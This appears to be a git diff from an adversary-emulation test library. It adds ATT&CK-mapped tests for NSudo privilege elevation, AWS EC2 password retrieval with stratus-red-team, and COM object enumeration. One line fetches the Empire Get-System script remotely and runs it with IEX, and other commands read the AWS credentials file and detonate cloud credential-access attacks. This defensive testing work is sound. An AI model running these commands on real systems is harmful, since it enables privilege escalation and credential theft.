+Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
+Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+```
+
+
+
+
 <br/>

atomics/T1134.001/T1134.001.yaml

@@ -29,3 +29,32 @@ atomic_tests:
       IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
     name: powershell
     elevation_required: true
+- name: Launch NSudo Executable
+  auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
+  description: |-
+    Launches the NSudo executable for a short period of time and then exits.
+    NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
+  supported_platforms:
+  - windows
+  input_arguments:
+    nsudo_path:
+      description: 'Path to the NSudo bat file'
+      type: Path
+      default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      NSudo.bat must exist in the specified path #{nsudo_path}
+    prereq_command: |
+      if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+      Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
+      Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
+      Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+  executor:
+    command: |
+     Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
+     Start-Sleep -Second 5
+     Stop-Process -Name "cmd" -force -erroraction silentlycontinue
+    name: powershell

atomics/T1552/T1552.md

@@ -0,0 +1,85 @@
+# T1552 - Unsecured Credentials
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1552)
+<blockquote>Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - AWS - Retrieve EC2 Password Data using stratus](#atomic-test-1---aws---retrieve-ec2-password-data-using-stratus)
+
+
+<br/>
+
+## Atomic Test #1 - AWS - Retrieve EC2 Password Data using stratus
+This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/
+
+**Supported Platforms:** Linux, macOS
+
+
+**auto_generated_guid:** a21118de-b11e-4ebd-b655-42f11142df0c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| stratus_path | Path of stratus binary | Path | $PathToAtomicsFolder/T1552/src|
+| aws_region | AWS region to detonate | String | us-west-2|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+export AWS_REGION=#{aws_region} 
+cd #{stratus_path}
+echo "starting warmup"
+./stratus warmup aws.credential-access.ec2-get-password-data
+echo "starting detonate"
+./stratus detonate aws.credential-access.ec2-get-password-data --force
+```
+
+#### Cleanup Commands:
+```sh
+export AWS_REGION=#{aws_region}
+
+echo "Cleanup detonation"
+cd #{stratus_path}
+./stratus cleanup --all
+rm -rf stratus*
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)
+##### Check Prereq Commands:
+```sh
+if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+if [ "$(uname)" == "Darwin" ]
+then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
+then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
+  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+fi
+```
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
+<br/>

atomics/T1552/T1552.yaml

@@ -0,0 +1,57 @@
+attack_technique: T1552
+display_name: 'Unsecured Credentials'
+atomic_tests:
+- name: AWS - Retrieve EC2 Password Data using stratus
+  auto_generated_guid: a21118de-b11e-4ebd-b655-42f11142df0c
+  description: |
+    This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/
+  supported_platforms:
+  - linux
+  - macos
+  input_arguments:
+    stratus_path:
+      description: Path of stratus binary
+      type: Path
+      default: $PathToAtomicsFolder/T1552/src
+    aws_region:
+      description: AWS region to detonate
+      type: String
+      default: us-west-2
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Stratus binary must be present at the (#{stratus_path}/stratus)
+    prereq_command: |
+      if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      if [ "$(uname)" == "Darwin" ]
+      then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+        tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+      elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
+      then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
+        wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+        tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+      fi
+  - description: |
+        Check if ~/.aws/credentials file has a default stanza is configured
+    prereq_command: |
+        cat ~/.aws/credentials | grep "default"
+    get_prereq_command: |
+        echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+  executor:
+    command: |
+      export AWS_REGION=#{aws_region} 
+      cd #{stratus_path}
+      echo "starting warmup"
+      ./stratus warmup aws.credential-access.ec2-get-password-data
+      echo "starting detonate"
+      ./stratus detonate aws.credential-access.ec2-get-password-data --force
+    cleanup_command: |
+      export AWS_REGION=#{aws_region}
+      
+      echo "Cleanup detonation"
+      cd #{stratus_path}
+      ./stratus cleanup --all
+      rm -rf stratus*
+    name: sh
+    elevation_required: false

atomics/T1574.008/T1574.008.md

@@ -35,7 +35,6 @@ https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combine
 
 ```powershell
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:"$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" "PathToAtomicsFolder\T1574.008\bin\calc.cs"
-Copy-Item "PathToAtomicsFolder\T1574.008\bin\Calc.exe" -Destination "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe"
 Powershell -noprofile
 ```
 

atomics/T1574.008/T1574.008.yaml

@@ -12,7 +12,6 @@ atomic_tests:
   executor:
     command: |
       C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:"$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" "PathToAtomicsFolder\T1574.008\bin\calc.cs"
-      Copy-Item "PathToAtomicsFolder\T1574.008\bin\Calc.exe" -Destination "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe"
       Powershell -noprofile
     cleanup_command: |
       Remove-Item "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" -ErrorAction Ignore

atomics/T1592.002/T1592.002.md

@@ -0,0 +1,59 @@
+# T1592.002 - Software
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1592/002)
+<blockquote>Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
+
+Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Enumerate COM Objects with Powershell](#atomic-test-1---enumerate-com-objects-with-powershell)
+
+
+<br/>
+
+## Atomic Test #1 - Enumerate COM Objects with Powershell
+This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
+An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. 
+See: https://www.mandiant.com/resources/hunting-com-objects
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0d80d088-a84c-4353-af1a-fc8b439f1564
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | File to output list of COM objects to | String | $env:temp&#92;T1592.002Test1.txt|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
+Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > $env:temp\clsids.txt
+ForEach($CLSID in Get-Content "$env:temp\clsids.txt")
+{try{write-output "$($Position)-$($CLSID)"
+write-output "------------"| out-file #{output_file} -append
+write-output $($CLSID)| out-file #{output_file} -append
+$handle=[activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))
+$handle | get-member -erroraction silentlycontinue | out-file #{output_file} -append
+$position += 1} catch{}}
+```
+
+#### Cleanup Commands:
+```powershell
+remove-item #{output_file} -force -erroraction silentlycontinue
+remove-item $env:temp\clsids.txt -force -erroraction silentlycontinue
+```
+
+
+
+
+
+<br/>

atomics/T1592.002/T1592.002.yaml

@@ -0,0 +1,31 @@
+attack_technique: T1592.002
+display_name: 'Gather Victim Host Information: Software'
+atomic_tests:
+- name: Enumerate COM Objects with Powershell
+  auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
+  description: |-
+   This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
+   An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. 
+   See: https://www.mandiant.com/resources/hunting-com-objects
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_file:
+      description: File to output list of COM objects to
+      type: String
+      default: $env:temp\T1592.002Test1.txt
+  executor:
+    command: |
+      New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
+      Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > $env:temp\clsids.txt
+      ForEach($CLSID in Get-Content "$env:temp\clsids.txt")
+      {try{write-output "$($Position)-$($CLSID)"
+      write-output "------------"| out-file #{output_file} -append
+      write-output $($CLSID)| out-file #{output_file} -append
+      $handle=[activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))
+      $handle | get-member -erroraction silentlycontinue | out-file #{output_file} -append
+      $position += 1} catch{}}
+    cleanup_command: |
+      remove-item #{output_file} -force -erroraction silentlycontinue
+      remove-item $env:temp\clsids.txt -force -erroraction silentlycontinue      
+    name: powershell

atomics/used_guids.txt

@@ -1128,3 +1128,7 @@ dda6fc7b-c9a6-4c18-b98d-95ec6542af6d
 bdc373c5-e9cf-4563-8a7b-a9ba720a90f3
 ee363e53-b083-4230-aff3-f8d955f2d5bb
 ec5d76ef-82fe-48da-b931-bdb25a62bc65
+7be1bc0f-d8e5-4345-9333-f5f67d742cb9
+a21118de-b11e-4ebd-b655-42f11142df0c
+0d80d088-a84c-4353-af1a-fc8b439f1564
+b1729c57-9384-4d1c-9b99-9b220afb384e